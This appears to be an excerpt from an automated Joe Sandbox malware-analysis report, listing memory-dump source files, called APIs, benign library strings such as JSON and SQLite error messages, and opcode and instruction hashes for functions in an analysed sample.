                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Processor$Virtualtask$Affinity::operator!=Concurrency::Concurrency::details::FeatureHardwarePresentRootRoot::char_traitsstd::bad_exception::bad_exceptionstd::bad_exception::~bad_exception
                                                                                    • String ID: in Json::Value::getMemberNames(), value must be objectValue
                                                                                    • API String ID: 2903312603-969050309
                                                                                    • Opcode ID: 0fd7b320dfb2ec36bc9b873b28bde22b796893f01752fa4b1af10cd135b9bb03
                                                                                    • Instruction ID: f33a86384bdd203b8e8db7ebe58bf5a1b9a273d333be0cf98b945f353ab5dce9
                                                                                    • Opcode Fuzzy Hash: 0fd7b320dfb2ec36bc9b873b28bde22b796893f01752fa4b1af10cd135b9bb03
                                                                                    • Instruction Fuzzy Hash: BB61E470901219DBDB28EF54CD92BFEB7B5AF54300F5042E9E50AA7291DB706E48CBA1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __aulldiv
                                                                                    • String ID: %llu$%llu$string or blob too big
                                                                                    • API String ID: 3732870572-3890766324
                                                                                    • Opcode ID: edb235d73f5e56b707b2bb0626c7ef91e6b59de8916c0a4510cb8f89bdf6f307
                                                                                    • Instruction ID: 6151dc72a6354daf5269b43eb4fbf8d73bbf7f93cec52dcfc8d5a15309b8d646
                                                                                    • Opcode Fuzzy Hash: edb235d73f5e56b707b2bb0626c7ef91e6b59de8916c0a4510cb8f89bdf6f307
                                                                                    • Instruction Fuzzy Hash: 79316D727846006BC7205A28AC42FA737D5DB86735F2887E8FD699F2C2DA32D90587D1
                                                                                    APIs
                                                                                    Strings
                                                                                    • Bad unicode escape sequence in string: four digits expected., xrefs: 00BBB575
                                                                                    • Bad unicode escape sequence in string: hexadecimal digit expected., xrefs: 00BBB665
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task
                                                                                    • String ID: Bad unicode escape sequence in string: four digits expected.$Bad unicode escape sequence in string: hexadecimal digit expected.
                                                                                    • API String ID: 1384045349-3825735986
                                                                                    • Opcode ID: 45cc897a1ab49891ffc722db3f18ef5bd8dc56d133fa5be59156dc56ecd1c303
                                                                                    • Instruction ID: 3412b4b25a04c856e5493692bc4c49655b364df33976da0e1746bbb124daadc9
                                                                                    • Opcode Fuzzy Hash: 45cc897a1ab49891ffc722db3f18ef5bd8dc56d133fa5be59156dc56ecd1c303
                                                                                    • Instruction Fuzzy Hash: 84512A74904549AFCB14CF98C591AFEFBB5EF46310F208199E8266B391D7B0AF45CB90
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __allrem
                                                                                    • String ID: winSeekFile$winTruncate1$winTruncate2
                                                                                    • API String ID: 2933888876-2471937615
                                                                                    • Opcode ID: 763b3b6dc224b3f19701190588daf0b2ffeea2d061adf0b6c7d980b7985a7705
                                                                                    • Instruction ID: 9d53737af8bdec4b516115acfc74fa3ab71f12f26f68f41e4ad485bdf1250ca2
                                                                                    • Opcode Fuzzy Hash: 763b3b6dc224b3f19701190588daf0b2ffeea2d061adf0b6c7d980b7985a7705
                                                                                    • Instruction Fuzzy Hash: E631C2712017009FD720CF38DC85AABB7E5FB84720F408A6DF966D3690DA70F8848B62
                                                                                    APIs
                                                                                    Strings
                                                                                    • in Json::Value::setComment(): Comments must start with /, xrefs: 00BBF729
                                                                                    • assert json failed, xrefs: 00BBF6A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: task
                                                                                    • String ID: assert json failed$in Json::Value::setComment(): Comments must start with /
                                                                                    • API String ID: 1384045349-3359747093
                                                                                    • Opcode ID: 080a8ee3b0a2f61af0ac037e5ce2a478fd2594bd4ee0c269b53dfa5b9d922189
                                                                                    • Instruction ID: 9ecd0527119feb60200ce712409ba01935e5b4525c42f995726189bc7bdbd9fd
                                                                                    • Opcode Fuzzy Hash: 080a8ee3b0a2f61af0ac037e5ce2a478fd2594bd4ee0c269b53dfa5b9d922189
                                                                                    • Instruction Fuzzy Hash: 7D416A70A00218AFDB24DF64DC41BEEB7B1EB06710F5085E9E4096B291DB745F85CF51
                                                                                    APIs
                                                                                    • task.LIBCPMTD ref: 00BBC694
                                                                                      • Part of subcall function 00BB3460: Concurrency::IVirtualProcessorRoot::IVirtualProcessorRoot.LIBCMTD ref: 00BB34A4
                                                                                      • Part of subcall function 00BA3630: char_traits.LIBCPMTD ref: 00BA366A
                                                                                      • Part of subcall function 00BBFD90: std::bad_exception::bad_exception.LIBCMTD ref: 00BBFD9D
                                                                                    • task.LIBCPMTD ref: 00BBC61E
                                                                                      • Part of subcall function 00C03D08: IsProcessorFeaturePresent.KERNEL32(00000017,00C0D33D,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000,00000000), ref: 00C03D24
                                                                                      • Part of subcall function 00BB5DB0: std::bad_exception::~bad_exception.LIBCMTD ref: 00BB5DC8
                                                                                    Strings
                                                                                    • in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing, xrefs: 00BBC5CC
                                                                                    • in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer, xrefs: 00BBC664
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Processor$Virtualtask$Concurrency::FeaturePresentRootRoot::char_traitsstd::bad_exception::bad_exceptionstd::bad_exception::~bad_exception
                                                                                    • String ID: in Json::Value::duplicateAndPrefixStringValue(): Failed to allocate string value buffer$in Json::Value::duplicateAndPrefixStringValue(): length too big for prefixing
                                                                                    • API String ID: 3203979678-1516562270
                                                                                    • Opcode ID: 5220caf529e319e90ff620244f6792d5b57aa74891a7e00f993d7732aa5cf8b2
                                                                                    • Instruction ID: 14cb154af7dbccb7273f746cb730c13c5796766889e42d14c3a9735f7ea51695
                                                                                    • Opcode Fuzzy Hash: 5220caf529e319e90ff620244f6792d5b57aa74891a7e00f993d7732aa5cf8b2
                                                                                    • Instruction Fuzzy Hash: 9541F570A04218EFDB24DF64CC45BEEB7B4AF05314F1086E9E51AA7281DB746B89CF51
                                                                                    APIs
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC2868
                                                                                    • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 00BC2883
                                                                                    • task.LIBCPMTD ref: 00BC28A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::task_continuation_context::task_continuation_context$task
                                                                                    • String ID:
                                                                                    • API String ID: 189456244-3916222277
                                                                                    • Opcode ID: 9df1c1218bdad49329222ac950d6ddab3218bdd705d5029ee8ac92c786534a4f
                                                                                    • Instruction ID: df21d555c7771898af6f94badf43435b7d678c20c6b82dce49f127764d4eedaa
                                                                                    • Opcode Fuzzy Hash: 9df1c1218bdad49329222ac950d6ddab3218bdd705d5029ee8ac92c786534a4f
                                                                                    • Instruction Fuzzy Hash: 5E2139B1D146589FCB14DF94C891BEDBBF4FF04310F4482AEE926AB691DB346A06CB50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 3213747228-0
                                                                                    • Opcode ID: f0f6a702232b21c87d1866c6473a717272bb34ce5a4a358055247c245837941f
                                                                                    • Instruction ID: fa913c8b9224e4f0d534aae3c334a152a01def5ce75691f4f35079426fe32c3e
                                                                                    • Opcode Fuzzy Hash: f0f6a702232b21c87d1866c6473a717272bb34ce5a4a358055247c245837941f
                                                                                    • Instruction Fuzzy Hash: 58B117719002469FDB11CFA8C881BFEBBF5EF55340F2581A9E867DB281D6349E42CB60
                                                                                    APIs
                                                                                    • __aulldiv.LIBCMT ref: 00B194BA
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B194DC
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B1952D
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B19577
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__aulldiv
                                                                                    • String ID:
                                                                                    • API String ID: 3650730422-0
                                                                                    • Opcode ID: 89866b2a443f8da8e00748f8c8947ca1a2de9a7aae6e5efb91662811a026ce4e
                                                                                    • Instruction ID: 437d6b8d34bf587aa6a50765cbbdb1c44a4a3135a7263f1d69f6b3d566a99414
                                                                                    • Opcode Fuzzy Hash: 89866b2a443f8da8e00748f8c8947ca1a2de9a7aae6e5efb91662811a026ce4e
                                                                                    • Instruction Fuzzy Hash: D33124366003D567EB368A6D8CA1BEE73DADBA9720FE441E9FD18E7341E5218CC14290
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BA505D
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::_Lockit.LIBCPMT ref: 00BA6D50
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00BA6D7A
                                                                                    • Concurrency::cancel_current_task.LIBCPMTD ref: 00BA50BA
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BA512C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                    • String ID:
                                                                                    • API String ID: 3053331623-0
                                                                                    • Opcode ID: aa032e7302961a2dd0a3669be5de090969ac7c802417f5775b5dcb04fe6cb1b8
                                                                                    • Instruction ID: e330b20f4b6040154ac2afcecabca2945915e9768ae8e7cbaf827df46265bf6d
                                                                                    • Opcode Fuzzy Hash: aa032e7302961a2dd0a3669be5de090969ac7c802417f5775b5dcb04fe6cb1b8
                                                                                    • Instruction Fuzzy Hash: 7B31F8B4D0420D9BCB14DFA4C981BEEB7F0FB59314F1042A9E91177291DB356A45CBA1
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00BD328D
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::_Lockit.LIBCPMT ref: 00BA6D50
                                                                                      • Part of subcall function 00BA6D30: std::_Lockit::~_Lockit.LIBCPMT ref: 00BA6D7A
                                                                                    • Concurrency::cancel_current_task.LIBCPMTD ref: 00BD32EA
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00BD335C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                                                                                    • String ID:
                                                                                    • API String ID: 3053331623-0
                                                                                    • Opcode ID: deb32c0894460cf8b6538b7657276405ed4b9d4ee03bf26c0c1789082b1da882
                                                                                    • Instruction ID: 9e1bf44bc2f3b3ecb4bbe17548d75eb7ce350804a7b83ba8b75f9e1e4a0415ff
                                                                                    • Opcode Fuzzy Hash: deb32c0894460cf8b6538b7657276405ed4b9d4ee03bf26c0c1789082b1da882
                                                                                    • Instruction Fuzzy Hash: 493109B4D002099BCB04DFA4C981BEEF7F4EB58710F1042AAE91577391DB346E44CBA5
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: char_traits
                                                                                    • String ID:
                                                                                    • API String ID: 1158913984-0
                                                                                    • Opcode ID: a0711d61e38acf7070c368135ff74269b51477c1b5cb546512adb668b13c42ee
                                                                                    • Instruction ID: f0daafe05bbdc82b1868f436842ba0f3db696516f63aedafaf64362bf48641b6
                                                                                    • Opcode Fuzzy Hash: a0711d61e38acf7070c368135ff74269b51477c1b5cb546512adb668b13c42ee
                                                                                    • Instruction Fuzzy Hash: C12177B6D08108BBCF04EBA0D8529EF7BF4AF56304F4481EAF4125B243EB349645C7A2
                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00C0B710,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00C0D286
                                                                                    • _free.LIBCMT ref: 00C0D2E3
                                                                                    • _free.LIBCMT ref: 00C0D319
                                                                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00C0D324
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_free
                                                                                    • String ID:
                                                                                    • API String ID: 2283115069-0
                                                                                    • Opcode ID: beb5bf9e9f1224936d403fc097286f8d2241c54309127fd650c0816b832c6124
                                                                                    • Instruction ID: b83114951353060bb075570f85eae085eec8e15a007a4212e5299e473be3d160
                                                                                    • Opcode Fuzzy Hash: beb5bf9e9f1224936d403fc097286f8d2241c54309127fd650c0816b832c6124
